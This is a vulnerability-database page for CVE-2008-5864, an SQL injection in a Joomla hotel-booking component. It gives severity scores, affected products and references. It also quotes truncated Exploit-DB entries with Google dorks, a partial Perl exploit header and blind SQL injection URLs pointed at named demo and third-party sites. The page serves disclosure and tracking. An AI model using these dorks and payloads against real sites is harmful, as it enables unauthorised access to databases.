CVE-2008-5864
published 2009-01-06CVE-2008-5864: SQL injection vulnerability in the Top Hotel (com_tophotelmodule) component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.01%
78.4th percentile
SQL injection vulnerability in the Top Hotel (com_tophotelmodule) component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlahbs | com_tophotelmodule | — | — |
| joomlahbs | hotel_booking_reservation_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component 5starhotels - SQL Injection
exploitdb·2008-12-24
CVE-2008-5875 Joomla! Component 5starhotels - SQL Injection
Joomla! Component 5starhotels - SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_5starhotels Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_5starhotels
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_5starhotels"
########################################
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\
Exploit-DB
Joomla! Component com_lowcosthotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_lowcosthotels - Blind SQL Injection
Joomla! Component com_lowcosthotels - Blind SQL Injection
---
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@
Exploit-DB
Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_tophotelmodule(id) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Top Hotel Module
#[!] 06/07/2008
#[!] Joomla HBS
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option
Exploit-DB
Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_hbssearch(r_type) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Joomla HBS
#[!] Administrator
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhote
No writeups or analysis indexed.
http://securityreason.com/securityalert/4871http://www.securityfocus.com/bid/32952https://exchange.xforce.ibmcloud.com/vulnerabilities/47540https://www.exploit-db.com/exploits/7539http://securityreason.com/securityalert/4871http://www.securityfocus.com/bid/32952https://exchange.xforce.ibmcloud.com/vulnerabilities/47540https://www.exploit-db.com/exploits/7539
2009-01-06
Published